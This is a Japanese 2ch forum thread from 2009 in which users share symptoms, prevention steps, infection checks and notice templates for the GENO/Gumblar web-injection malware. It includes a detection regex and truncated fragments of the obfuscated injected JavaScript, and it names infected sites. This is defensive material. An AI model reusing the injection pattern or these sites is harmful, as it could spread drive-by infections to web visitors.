GENOウイルススレ

このエントリーをはてなブックマークに追加
1192.168.0.774
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/
2192.168.0.774:2009/05/16(土) 14:07:34 ID:EILz2Sb70
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3192.168.0.774:2009/05/16(土) 14:08:00 ID:EILz2Sb70
以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4192.168.0.774:2009/05/16(土) 14:08:20 ID:EILz2Sb70
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
5192.168.0.774:2009/05/16(土) 14:08:46 ID:EILz2Sb70
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
6192.168.0.774:2009/05/16(土) 14:09:24 ID:EILz2Sb70
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです

Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

7192.168.0.774:2009/05/16(土) 14:10:56 ID:hzDONx9U0
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
8192.168.0.774:2009/05/16(土) 14:14:11 ID:cmMngAoD0
亜種があるから>>7でないからと言って絶対に白だとはいえないが、
>>7だったら100%黒
9192.168.0.774:2009/05/16(土) 14:14:14 ID:v6iqPVHwP
現行スレ
同人板
【管理も】同人サイト・GENOウィルス注意2【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242443932/
セキュリティ板
GENOウイルススレ ★5(実質★6)
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
10192.168.0.774:2009/05/16(土) 14:16:50 ID:EILz2Sb70
>>1
スレ立て乙でした。
テンプレはこんなものですか
11192.168.0.774:2009/05/16(土) 14:18:10 ID:hzDONx9U0
ageていきましょう
12192.168.0.774:2009/05/16(土) 14:20:02 ID:uAe98uZ60
ん?もう書いてええのん?
13192.168.0.774:2009/05/16(土) 14:31:58 ID:tn4HDAid0
IPブロックの纏めテキストと、PG2での導入方法等も纏めた方がよさげか
14192.168.0.774:2009/05/16(土) 14:37:33 ID:v6iqPVHwP
まとめると

サイトを開く

htmlに書かれたjsコードが実行される

別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず

実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm

regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。

オワタ

こんな感じでいいのかな。
で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう
って事でいいのかな?今北で情報が多くてよくわからん
15192.168.0.774:2009/05/16(土) 14:38:39 ID:ayXPZTg40
http://namidame.2ch.net/test/read.cgi/poverty/1242359071
これは既出?もう用無し?
16192.168.0.774:2009/05/16(土) 14:47:30 ID:arP7FdRW0
こんなときだからこそ
リンク先の内容も一緒に貼って欲しい
17192.168.0.774:2009/05/16(土) 14:50:03 ID:ayXPZTg40
ごめん。内容はコレ↓

【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染

1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)http://pc11.2ch.net/test/read.cgi/sec/1240853183/
対策と駆除はこちら (p)http://www29.atwiki.jp/geno/pages/14.html
Adobe Reader/Flashのアップデートをお忘れ無く (p)http://www.adobe.com/jp/
745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど(p)http://www3.atword.jp/gnome/のサイトにかいてある
(中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
 61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
18192.168.0.774:2009/05/16(土) 14:51:25 ID:ayXPZTg40
あー・・もうなんかグダグダorz許して
19192.168.0.774:2009/05/16(土) 14:53:44 ID:gMiU0OeL0
勘違いする人が増えるような貼りかた止めろ
それ@niftyがホストしてるサイトの一部にってことだろ
20192.168.0.774:2009/05/16(土) 14:55:51 ID:ayXPZTg40
そうなのか。騒いでごめんなさい
21192.168.0.774:2009/05/16(土) 15:12:09 ID:v6iqPVHwP
フィルター始めて作ってみたけどどうだろ。
name
test
match
(function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g);
replace
<!-- type hidden --!>
22192.168.0.774:2009/05/16(土) 16:39:00 ID:+Kk3rzau0
23192.168.0.774:2009/05/16(土) 16:58:38 ID:OzJB1Y+z0
何かギスギスしてんな
24192.168.0.774:2009/05/16(土) 18:08:57 ID:L69MESm3O
>>1

25192.168.0.774:2009/05/16(土) 18:12:33 ID:v6iqPVHwP
どうやらここが次スレになるらしい
あぼん出来るし良かった
26192.168.0.774:2009/05/16(土) 18:17:17 ID:cXEySQE80
>>25
向こうに7立ったみたいw
27192.168.0.774:2009/05/16(土) 18:19:07 ID:zXe/9KrE0
俺が立てといた
窓口は多い方がいいと思ってね
28192.168.0.774:2009/05/16(土) 18:21:17 ID:v6iqPVHwP
>>27
随分と荒れた窓口だな
29192.168.0.774:2009/05/16(土) 18:25:02 ID:H7YmOp+10
隔離スレにもなりゃしねぇ
30192.168.0.774:2009/05/16(土) 18:57:13 ID:zXe/9KrE0
俺は普通に波風タタサズニ立てたかったんだけどね
31192.168.0.774:2009/05/16(土) 23:10:45 ID:WN9EdhyZ0
むしろこっちはまったりやればいい
32192.168.0.774:2009/05/17(日) 11:37:22 ID:T9pTie3x0
セキュ板が荒れたので情報まとまらない。
こっちへ移動してきた。ヨロ。
33192.168.0.774:2009/05/17(日) 11:37:51 ID:QnwsxDv40
同じく、よろ。
34192.168.0.774:2009/05/17(日) 11:39:21 ID:MP/sWvjo0
俺もこっちにしよう
35192.168.0.774:2009/05/17(日) 11:40:45 ID:ma6xyjDQ0
ヤレヤレ。こっちまで追いかけてこないでくれればいいんだけど。
36192.168.0.774:2009/05/17(日) 11:40:51 ID:FkD7jhlA0
同人板からきました\(^O^)/
37192.168.0.774:2009/05/17(日) 11:40:59 ID:dj6spVc50
変な奴もまとめてこっちに来ればいい
まとめてNGできるし
38192.168.0.774:2009/05/17(日) 11:41:36 ID:MP/sWvjo0
コレ、テンプレ追加でいい?

GENOのウイルスサイトチェッカー完成した
http://geno.2ch.tc/
39192.168.0.774:2009/05/17(日) 11:42:52 ID:DhBs/7gt0
いいんじゃね
40192.168.0.774:2009/05/17(日) 11:43:25 ID:5zpzhS0v0
必要な情報は上で揃ってるな
特に追加するようなことは今のところないよね?
41192.168.0.774:2009/05/17(日) 11:44:03 ID:T9pTie3x0
向こうの最後の方ににあった感染サイト
うこっけい?とかあの辺ってもうまとめに入ってるのかな?
42192.168.0.774:2009/05/17(日) 11:44:21 ID:gUnnPMxe0
・なんらかの方法によるサーバへの侵入
FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・Webサイトの改ざん
具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを
各ページに埋め込まれます。
%3CsI0cTJrZliptの部分については異なるパターンもあったようです。
・そのほかの詳細は不明です

発見方法
・公開しているすべてのページに該当スクリプトコードが埋め込まれているか
確認してください。その他の影響については詳細不明です。

対処
感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており
管理FTPパスワードの漏洩なのかSQLインジェクション等の
Webアプリ脆弱性を攻撃されたものなのかわかっていません。
改ざんされたスクリプトコードの削除だけで済む問題ではなく
侵入された経路の究明および対策が必要となってくると思われます。
43192.168.0.774:2009/05/17(日) 11:45:27 ID:QnwsxDv40
何か変化起きた時のために保守気味で進行でいんじゃね?
先週金曜まではそうだったし。
saymoveと同人が来てから無駄に加速したね。
44192.168.0.774:2009/05/17(日) 11:45:48 ID:Sggs+C2i0
>>38
ありがとう助かります。
何せ外部リンクを結構チェックしないといけないので
45192.168.0.774:2009/05/17(日) 11:46:35 ID:dj6spVc50
同人というより鬼の首とったように
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
46192.168.0.774:2009/05/17(日) 11:48:59 ID:T9pTie3x0
静けさが嘘のようだw
47192.168.0.774:2009/05/17(日) 11:50:50 ID:6zykGUMd0
よろしくー
48192.168.0.774:2009/05/17(日) 11:51:08 ID:MP/sWvjo0
ID出るだけでこうも違うとはw

>>44
作者さんに言ってあげて。俺、単なる間違い指摘入れただけの人だから。
49192.168.0.774:2009/05/17(日) 11:51:42 ID:rsI8zkAT0
移動完了
50192.168.0.774:2009/05/17(日) 11:53:03 ID:6zykGUMd0
烏骨鶏は凸電誰かしましたか?

放置しておくと大変なことになる
51192.168.0.774:2009/05/17(日) 11:53:07 ID:ffQj4EqF0
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。

もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
52192.168.0.774:2009/05/17(日) 11:56:19 ID:/tk9oSEO0
>>50
電話番号書いてあるのは公式HPぐらい。

缶切りが缶詰の中に入ってる状態とはこの事
53192.168.0.774:2009/05/17(日) 11:57:28 ID:vLbMFr+GP
誰かタウンページ持ってこい
54192.168.0.774:2009/05/17(日) 11:59:04 ID:T9pTie3x0
>>50
流れちゃってわかんないけど、もいっこあった希ガス
55あっちのスレの42:2009/05/17(日) 11:59:23 ID:2KRNOGSH0
>>51
9.1.1で修正された方だと思っていたが・・・。
56192.168.0.774:2009/05/17(日) 11:59:46 ID:6zykGUMd0
ver.9.1ではバッファーオーバーフローの脆弱性あったよね
ver.9.1.1でそれを解決したんじゃない
57192.168.0.774:2009/05/17(日) 12:01:29 ID:Sggs+C2i0 BE:762340739-S★(634668)
58192.168.0.774:2009/05/17(日) 12:01:52 ID:ffQj4EqF0
>>55
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
59192.168.0.774:2009/05/17(日) 12:02:30 ID:2KRNOGSH0
ダメだ。あっちのスレでこっちに誘導してる・・・。
60192.168.0.774:2009/05/17(日) 12:04:01 ID:0Et/Qq5U0
61192.168.0.774:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?

hXXp://www.seibidoshuppan.co.jp/
感染確認
62192.168.0.774:2009/05/17(日) 12:05:20 ID:6zykGUMd0
>>61
今日は休みじゃないかな?
63192.168.0.774:2009/05/17(日) 12:06:39 ID:2KRNOGSH0
>>59
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。


情報は本当に少ないね。
64192.168.0.774:2009/05/17(日) 12:09:32 ID:T9pTie3x0
>>61
うこっけい
http://www.100bangai.co.jp/shop/0443.html
これか?お菓子やさんだったの・・・?

googleからurl検索したらavastさんが怒って焦ったw
65192.168.0.774:2009/05/17(日) 12:21:14 ID:6zykGUMd0
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?

hXXp://www.seibidoshuppan.co.jp/
感染確認  ここは出版社

烏骨鶏はhxxp://www.ukokkei.co.jp/

フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
66192.168.0.774:2009/05/17(日) 12:23:41 ID:T9pTie3x0
>>65
>>64に載ってるよ。多分それ。そこは踏んでも平気。
ukokkeiのurlで検索するとトロイ検出するから気をつけてw
店舗のメアドがない
67192.168.0.774:2009/05/17(日) 12:26:11 ID:MP/sWvjo0
>>65
せいびどう出版社って何処だか知らないけど、オペレーターに訳を説明して
TEL転送とか、電話先を教えてくれるんじゃない?
68192.168.0.774:2009/05/17(日) 12:28:00 ID:PUr+H3m+0
「お宅のHPを見たらウィルスの警告が出てくる。
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
69192.168.0.774:2009/05/17(日) 12:29:48 ID:T9pTie3x0
本名で教えても良いけど、ウイルス食らっちゃうような店に
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
70192.168.0.774:2009/05/17(日) 12:31:42 ID:6zykGUMd0
こことhxxp://www.ukokkei.co.jp/
専門店街は住所が違うよ
71192.168.0.774:2009/05/17(日) 12:32:07 ID:xG23ce6c0
>>5
感染者がcmd.exeを起動してはダメというレスを別板で見たんだが
このテンプレはこれでいいのか?
72192.168.0.774:2009/05/17(日) 12:32:20 ID:2KRNOGSH0
IPAも平日しか働いていないのか・・・。
受付時間:平日10:00〜12:00、13:30〜17:00
73192.168.0.774:2009/05/17(日) 12:37:07 ID:6zykGUMd0
とりあえずフリーダイアルで電話して
責任者読んで説明してみる
74192.168.0.774:2009/05/17(日) 12:38:07 ID:PUr+H3m+0
>>73
お前が失敗すると後から凸っても全部悪戯扱いだからな。
それなりに頑張れ
75192.168.0.774:2009/05/17(日) 12:39:36 ID:T9pTie3x0
>>73
フリーダイアルは専門店街のやつ?
76192.168.0.774:2009/05/17(日) 12:41:04 ID:6zykGUMd0
>>75
www.ukokkei.co.jp/ ここ
77192.168.0.774:2009/05/17(日) 12:42:49 ID:T9pTie3x0
>>74
プレッシャーかけんなww

so-netの説明がそれなりに説得力あるけど
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
電話だとえっちてーてーぴー.って言わないとダメだな

まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
78192.168.0.774:2009/05/17(日) 12:43:13 ID:6zykGUMd0
【本店】のフリーダイヤル
79192.168.0.774:2009/05/17(日) 12:45:11 ID:2KRNOGSH0
>>71
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。

ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。

バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
80192.168.0.774:2009/05/17(日) 12:45:45 ID:PUr+H3m+0
電凸用のテンプレも必要になってくるのかな?

>>77
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
81192.168.0.774:2009/05/17(日) 12:47:00 ID:6zykGUMd0
電話でない罠>本店
82192.168.0.774:2009/05/17(日) 12:49:33 ID:T9pTie3x0
>>80
正攻法ならそれでいいんじゃない?

・ホームページを見た人が感染する

製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
83192.168.0.774:2009/05/17(日) 12:54:36 ID:c9IgsGG/0
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
84192.168.0.774:2009/05/17(日) 12:55:41 ID:+3+vFr3c0
wiki重いぬ
85192.168.0.774:2009/05/17(日) 12:57:28 ID:ytTR6LEA0
烏骨鶏と出版社のWhoisを調べる。
86192.168.0.774:2009/05/17(日) 12:58:45 ID:Um/4qeYR0
成美堂出版が感染しました
87192.168.0.774:2009/05/17(日) 12:59:12 ID:6zykGUMd0
a. [ドメイン名] UKOKKEI.CO.JP
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
88192.168.0.774:2009/05/17(日) 12:59:17 ID:mJUiMCyk0
>>3の下の報告もここでいいのか?
邪魔になってない?
89192.168.0.774:2009/05/17(日) 13:01:24 ID:ytTR6LEA0
>>87
Whoisの結果のこの下に担当者と連絡先
があったような気がするのだが。
90192.168.0.774:2009/05/17(日) 13:01:40 ID:Sggs+C2i0 BE:508227629-S★(634671)
>>88
向こうのスレを見ていると機能していないんですよね
91192.168.0.774:2009/05/17(日) 13:02:58 ID:6zykGUMd0
>>89
それが無いです
92192.168.0.774:2009/05/17(日) 13:05:32 ID:T9pTie3x0
>>87
あるよ。
担当者名とメールアドレス
ここに晒しちゃまずいかな?
レン鯖はフューチャースピリッツ
93192.168.0.774:2009/05/17(日) 13:05:40 ID:ilxyL7Fy0
>>5
>Bavast!(無料のアンチウイルスソフト)で確認

これ違う。感染後の確認には使えない。


avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)

すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
 セキュリティソフトベンダーでも追い付いていない)

予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。

幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。

スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
94192.168.0.774:2009/05/17(日) 13:06:06 ID:ytTR6LEA0
>>91
昔調べたときあったと思ったのだなあ。
Whoisがそれでトラブルがあったとしか記憶がない。

ないならしょうがないか。
ありがとう。
95192.168.0.774:2009/05/17(日) 13:06:43 ID:6zykGUMd0
>>92
あった?Whoisは公開されてるものだからいいでしょ
96192.168.0.774:2009/05/17(日) 13:07:39 ID:ytTR6LEA0
>>92
>担当者名とメールアドレス
>レン鯖はフューチャースピリッツ
そこに警告のメールを送ってみるしかないだろうね。
97192.168.0.774:2009/05/17(日) 13:08:17 ID:IjPG7tgR0
>>80
素人向けには難しい言葉ばかりだな。

・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。

これぐらいでいいんじゃね?
98192.168.0.774:2009/05/17(日) 13:08:53 ID:6zykGUMd0
>>92
Whoisクライアント何使ってるんですか?
99192.168.0.774:2009/05/17(日) 13:08:58 ID:mJUiMCyk0
>>90
煽りや質問多いもんな
100192.168.0.774:2009/05/17(日) 13:09:52 ID:2KRNOGSH0
>>88
スレがあんなにヒドイことになると思わずに立ったスレだから、
仕方ないよね。

>>96
名前と電話番号
みっけた。
けど、ここに書いて本当にいいのか俺には分からない。
101192.168.0.774:2009/05/17(日) 13:10:13 ID:T9pTie3x0
102192.168.0.774:2009/05/17(日) 13:10:15 ID:um/XFnMU0
>>97
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
103192.168.0.774:2009/05/17(日) 13:10:30 ID:7TaPV4fL0
>>93
やっぱ現段階ではNoScript必須ですな。
JavaScriptを利用しない形式に変わったらそれすら無効ですが・・・。
104192.168.0.774:2009/05/17(日) 13:11:54 ID:T9pTie3x0
>>97
2番目が難しいと思う
見た人(顧客)が感染するって入れた方がいいんでない
105192.168.0.774:2009/05/17(日) 13:11:57 ID:ilxyL7Fy0
>>42
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。

・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
 (動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
 可能性があり、そちらから操作される可能性がある

こんな感じかな。
106192.168.0.774:2009/05/17(日) 13:12:03 ID:I5G8A/p20
>>98
http://whois.jprs.jp/
でWhois検索すると、登録担当者と技術担当者のIDがリンクで出てくるのでそれをポチっと。
107192.168.0.774:2009/05/17(日) 13:13:30 ID:ytTR6LEA0
>>100
感染したサイトの会社に連絡つかないと
そこしか通報するしかないからねえ。
とりあえず、文章だけども考えておかないと。
108192.168.0.774:2009/05/17(日) 13:13:49 ID:6zykGUMd0
>>106
あり〜
109192.168.0.774:2009/05/17(日) 13:16:03 ID:ilxyL7Fy0
○○○○ ご担当者さま

■ お願い

御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。

同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。

これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。

下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。

(感染報告のあったスレッド等のアドレス)

HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。

■ 確認した感染ページ
(わかる範囲で記載)

<多分、全てのページが感染中>

●HTMLファイルの場合
 <body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
 ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
 ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
110192.168.0.774:2009/05/17(日) 13:17:21 ID:T9pTie3x0
>>109
俺が担当なら読まないで捨てるww
so-net貼ってあげたら?
111192.168.0.774:2009/05/17(日) 13:17:22 ID:ilxyL7Fy0
■感染していると思われるページの危険部分

(一応、ページによって内容異なるので、ソースチェッカーなり、
 IE以外のブラウザでview-source:〜 で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>

■ 感染していると思われるウイルスの情報

下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864
http://www.kobayashi.co.jp/info/090512.html
http://www29.atwiki.jp/geno/
(↓はちょっと専門的な解説です)
http://ilion.blog.shinobi.jp/Entry/85/
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。

PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。


■ 解決方法について

駆除方法
http://www29.atwiki.jp/geno/pages/14.html

一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)

OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。

安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。

